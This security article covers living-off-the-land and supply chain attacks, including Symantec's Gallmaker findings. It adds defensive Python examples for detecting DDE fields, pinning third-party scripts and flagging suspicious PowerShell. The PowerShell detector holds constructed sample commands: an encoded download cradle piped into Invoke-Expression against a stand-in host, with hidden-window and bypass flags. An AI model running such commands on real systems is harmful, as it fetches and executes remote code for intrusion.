As most companies have learned, unhappily, in recent years, hackers and other cyber criminals are nothing if not resourceful. Sometimes that resourcefulness manifests itself in the creation of sophisticated malware code, or perhaps in clever social engineering ploys that trick users into taking risky actions.
When the countermeasures of defenders prove effective, however, resourceful attackers readily turn to more promising avenues of exploitation. Increasingly, those avenues involve attacking trusted software that people are already using, as well as leveraging established supply chains such as software tools vendors and cloud service providers.
Attacks that target installed software tools and operating system features are said to be “living off the land”, as they build on software that is generally available across the computing landscape. Supply chain attacks are a distinct, but related, attack approach, in that they compromise the offerings of existing and trusted suppliers.
Living off the land and supply chain attacks have been around for years, but spiked significantly in the past year, according to Symantec’s 2019 Internet Security Threat Report (ISTR). For example, malicious scripts that use the PowerShell task automation and configuration management framework increased by 1,000% during 2018, the ISTR reports. With its installed base of cyber security tools, Symantec itself is blocking an average of 115,000 malicious PowerShell scripts each month.
For their part, supply chain attacks increased by 78% during 2018. “Exploits and vulnerabilities are getting harder to find, so attackers are just weaponizing something that’s already there,” says Orla Cox, director of security response at Symantec, in explaining the rise of both living off the land and supply chain assaults.
In most cases, living off the land attacks are just one element of multi-pronged assaults. During 2018, however, Symantec researchers found a “pure” living off the land attack group, which the researchers dubbed Gallmaker. The attackers focused on government and military targets in Eastern Europe and the Middle East but used no malware in their operations.
Instead, the Gallmaker group sent malicious Office documents to targeted users, most likely using spear-phishing techniques to get users to open the documents and enable their contents. These actions, in turn, let the attackers use the Microsoft Dynamic Data Exchange (DDE) protocol to remotely execute commands in memory on the victim’s computer and to execute other living off the land tools.
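The DDE technique described above leaves a recognisable artefact in the document itself: a field instruction beginning with DDE or DDEAUTO inside word/document.xml. The scanner below is an added example, not code from the article or from Symantec; it builds two constructed, minimal .docx-style archives in memory (one with an ordinary PAGE field, one with a DDEAUTO field whose instruction is split across two runs, as some real samples do to evade naive string matching) and reports any DDE field it finds. The file layout it assumes is the standard WordprocessingML structure; the placeholder command in the sample is constructed and does nothing.

```python
import html
import io
import re
import zipfile
from typing import List, Optional

# Word stores field instructions either in the w:instr attribute of a <w:fldSimple>
# element (simple fields) or in one or more <w:instrText> runs between the
# <w:fldChar> "begin" and "separate"/"end" markers of a complex field.
FLD_SIMPLE = re.compile(r'<w:fldSimple[^>]*\bw:instr="([^"]*)"', re.S)
TOKEN = re.compile(
    r'<w:fldChar[^>]*w:fldCharType="(begin|separate|end)"[^>]*/?>'
    r'|<w:instrText[^>]*>(.*?)</w:instrText>', re.S)
# Field names are case-insensitive; DDE and DDEAUTO are the two DDE field types.
DDE_FIELD = re.compile(r"^\s*DDE(?:AUTO)?\b", re.I)


def extract_field_instructions(docx_bytes: bytes) -> List[str]:
    """Return every field instruction in word/document.xml, joining split instrText runs."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        xml = z.read("word/document.xml").decode("utf-8", errors="replace")
    instructions = [html.unescape(i) for i in FLD_SIMPLE.findall(xml)]
    current: Optional[List[str]] = None
    for m in TOKEN.finditer(xml):
        kind, text = m.group(1), m.group(2)
        if kind == "begin":
            current = []                      # a new complex field starts here
        elif kind in ("separate", "end"):
            if current is not None:           # instruction ends at the first separate/end marker
                instructions.append(html.unescape("".join(current)))
            current = None
        elif text is not None and current is not None:
            current.append(text)              # accumulate the (possibly split) instruction
    return instructions                       # nested fields are not modelled here


def find_dde_fields(docx_bytes: bytes) -> List[str]:
    """Return the DDE/DDEAUTO field instructions found in the document, stripped."""
    return [i.strip() for i in extract_field_instructions(docx_bytes) if DDE_FIELD.search(i)]


def make_constructed_docx(body_xml: str) -> bytes:
    """Build a minimal zip holding only word/document.xml (a constructed sample, not a real Word file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(
            "word/document.xml",
            '<?xml version="1.0" encoding="UTF-8"?>'
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            f"<w:body>{body_xml}</w:body></w:document>")
    return buf.getvalue()


# Constructed sample 1: an ordinary page-number field, which must not be flagged.
BENIGN_DOC = make_constructed_docx(
    '<w:p><w:fldSimple w:instr=" PAGE \\* MERGEFORMAT "><w:r><w:t>1</w:t></w:r></w:fldSimple></w:p>')

# Constructed sample 2: a DDEAUTO field whose instruction is split over two runs.
# The executable path and arguments are placeholders, not a working command.
DDE_DOC = make_constructed_docx(
    '<w:p>'
    '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>'
    '<w:r><w:instrText xml:space="preserve">AUTO c:\\\\placeholder\\\\app.exe &quot;placeholder-args&quot; </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>placeholder field result</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
    '</w:p>')

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_DOC), ("dde", DDE_DOC)):
        print(name, find_dde_fields(doc))
```

Joining the instrText runs before matching is the part that matters: a check that only looks for the literal string "DDEAUTO" in the raw XML misses the split-run sample, while this scanner flags it. A real mail-gateway or endpoint check would also inspect embedded documents and other Office container formats, which this example does not cover.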
As Symantec noted when publicizing its discovery of Gallmaker, the “attackers are hoping to ‘hide in plain sight,’ with their malicious activity hidden in a sea of legitimate processes.”
Perpetrators of supply chain attacks have much the same aim. As Symantec’s ISTR notes, this type of attack can take many forms, “including hijacking software updates and injecting code into legitimate software.” Cloud service providers are also common targets, with the goal being to turn established cloud services into attack vehicles.
Symantec’s ISTR documents a steep rise in formjacking attacks during 2018, with many of them being part of supply chain attacks. Often, the attackers were found to be targeting third-party services commonly used by online retailers, such as chatbots or customer review widgets.
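One concrete way a retailer can keep trusting a third-party widget while still verifying it is to pin the script's content with Subresource Integrity: the browser refuses to run a script whose hash no longer matches the pinned value, so code injected into the supplier's copy fails closed instead of reaching the checkout page. The snippet below is an added example, not code from the article or from Symantec. It computes the pin, emits the matching script tag, and audits a set of fetched scripts against recorded pins; the widget bodies and URLs are constructed samples, and the example assumes the widget is served as a static file (a script the supplier legitimately changes on every request cannot be pinned this way).

```python
import base64
import hashlib
import hmac
from typing import Dict, List


def sri_hash(script_bytes: bytes, algo: str = "sha384") -> str:
    """Compute a Subresource Integrity value of the form '<algo>-<base64 digest>'."""
    digest = hashlib.new(algo, script_bytes).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def verify_pinned(script_bytes: bytes, expected: str) -> bool:
    """True when the fetched body matches the pin; the algorithm is read from the pin itself."""
    algo, _, _ = expected.partition("-")
    return hmac.compare_digest(sri_hash(script_bytes, algo), expected)


def script_tag(src: str, pin: str) -> str:
    """Render the tag a page should use for a pinned cross-origin script.

    crossorigin is required for SRI on a cross-origin resource, otherwise the
    browser cannot compare the hash and blocks the script.
    """
    return f'<script src="{src}" integrity="{pin}" crossorigin="anonymous"></script>'


def audit(fetched_by_url: Dict[str, bytes], pins: Dict[str, str]) -> List[str]:
    """Return the URLs whose current content no longer matches the pin recorded at vetting time."""
    return [url for url, body in fetched_by_url.items() if not verify_pinned(body, pins[url])]


# Constructed samples: the widget as vetted, and a copy with code appended by a third party.
VETTED_WIDGET = b"window.reviewWidget = function () { /* constructed benign widget */ };\n"
TAMPERED_WIDGET = VETTED_WIDGET + b"/* constructed: any appended change breaks the pin */\n"
PINNED = sri_hash(VETTED_WIDGET)

# Constructed URLs for the audit example (.invalid is reserved and never resolves).
REVIEW_URL = "https://widget.example.invalid/review.js"
CHAT_URL = "https://chat.example.invalid/chat.js"

if __name__ == "__main__":
    print(script_tag(REVIEW_URL, PINNED))
    print(audit({REVIEW_URL: TAMPERED_WIDGET, CHAT_URL: VETTED_WIDGET},
                {REVIEW_URL: PINNED, CHAT_URL: PINNED}))
```

The pin is recorded when the security team reviews the widget, and re-recorded only after the next review; a periodic audit like the one above then turns a silently modified supplier script into an alert rather than a working formjacking payload.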
Due to the relative ease of using trusted software and channels – and the difficulty in detecting and countering those exploits – Cox says we can expect living off the land and supply chain attacks to become “the new normal.” Despite the inherently stealthy nature of these attacks, however, there are ways to combat them.
Symantec’s ability to discover the Gallmaker living off the land attack illustrates this defensive potential. Gallmaker’s use of living off the land tactics along with publicly available hack tools made it extremely difficult to detect. Symantec was able to discover the attack thanks to the cyber security firm’s Targeted Attack Analytics (TAA) technology.
Part of the company’s Advanced Threat Protection portfolio, TAA includes sophisticated artificial intelligence and machine learning technology in order to provide organizations with “virtual analysts” that are able to spot potential threats. In the case of the Gallmaker attack, Symantec’s TAA flagged certain PowerShell commands as suspicious, which ultimately led to the discovery of the group’s living off the land campaign.
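The article does not say which PowerShell commands TAA flagged, so the detector below is an added example of the general idea rather than Symantec's method: a small weighted heuristic run over constructed log lines in the style of PowerShell Script Block Logging (Event ID 4104). No single indicator is malicious on its own, since administrators use encoded commands and web downloads legitimately, so the score only crosses the threshold when several appear together. The example also decodes an -EncodedCommand payload (UTF-16LE, base64) so that indicators hidden inside it still count. The sample lines, URLs and threshold are all constructed for the example.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Indicator name -> (pattern, weight). -EncodedCommand may be abbreviated to -e, -ec, -en,
# -enc or -encoded, so the pattern accepts those prefixes followed by a base64 blob.
INDICATORS = {
    "encoded_command": (re.compile(r"(?i)-e(?:c|n(?:c(?:oded(?:command)?)?)?)?\s+[A-Za-z0-9+/=]{16,}"), 3),
    "hidden_window": (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), 2),
    "execution_policy_bypass": (re.compile(r"(?i)-ex(?:ecutionpolicy)?\s+bypass"), 2),
    "no_profile": (re.compile(r"(?i)-nop(?:rofile)?\b"), 1),
    "download_cradle": (re.compile(r"(?i)(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b)"), 3),
    "invoke_expression": (re.compile(r"(?i)(?:\bIEX\b|Invoke-Expression)"), 2),
    "base64_decode": (re.compile(r"(?i)FromBase64String"), 2),
}
SUSPICIOUS_THRESHOLD = 5  # constructed: tune against your own baseline of admin activity
ENCODED_PAYLOAD = re.compile(r"(?i)-e(?:c|n(?:c(?:oded(?:command)?)?)?)?\s+([A-Za-z0-9+/=]{16,})")


@dataclass
class Finding:
    line: str
    decoded: Optional[str]   # decoded -EncodedCommand payload, if any
    hits: Dict[str, int]     # indicator name -> weight
    score: int
    suspicious: bool


def decode_encoded_command(line: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (UTF-16LE text in base64), or None."""
    m = ENCODED_PAYLOAD.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="ignore")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def score_line(line: str) -> Finding:
    """Score one log line; indicators are searched in the raw line and in any decoded payload."""
    decoded = decode_encoded_command(line)
    texts = [line] + ([decoded] if decoded else [])
    hits = {name: weight for name, (pattern, weight) in INDICATORS.items()
            if any(pattern.search(t) for t in texts)}
    score = sum(hits.values())
    return Finding(line, decoded, hits, score, score >= SUSPICIOUS_THRESHOLD)


def scan(lines: List[str]) -> List[Finding]:
    """Return only the findings that crossed the threshold."""
    return [f for f in map(score_line, lines) if f.suspicious]


# Constructed payload for the encoded sample line: a download cradle piped into IEX.
# example.invalid is a reserved name that never resolves.
_CONSTRUCTED_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')".encode("utf-16le")
).decode("ascii")

# Constructed log lines in the style of Script Block Logging; not real telemetry.
SAMPLE_LOG_LINES = [
    "4104 Creating Scriptblock text (1 of 1): Get-ChildItem C:\\Users\\alice\\Documents",
    "4104 Creating Scriptblock text (1 of 1): powershell.exe -NoProfile -WindowStyle Hidden "
    "-ExecutionPolicy Bypass -EncodedCommand " + _CONSTRUCTED_ENCODED,
    "4104 Creating Scriptblock text (1 of 1): Import-Module ActiveDirectory; Get-ADUser -Filter *",
    "4104 Creating Scriptblock text (1 of 1): Invoke-Expression "
    "(New-Object System.Net.WebClient).DownloadString('http://example.invalid/x')",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print(finding.score, sorted(finding.hits), finding.line[:80])
```

Two design choices carry the weight here. Scoring combinations rather than single strings keeps routine administration (an encoded command on its own, a module import) below the threshold, and decoding the payload before matching is what catches the second sample line, whose download cradle is invisible in the raw text. Script Block Logging has to be enabled for these events to exist at all, which is the first thing to check when planning detections of this kind.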
Trusted, widely used software tools and supply chains present cyber criminals and other bad actors with almost irresistible attack avenues. Organizations need to understand the methods employed in these attacks and employ an approach that has become common in nuclear weapons negotiations: trust but verify.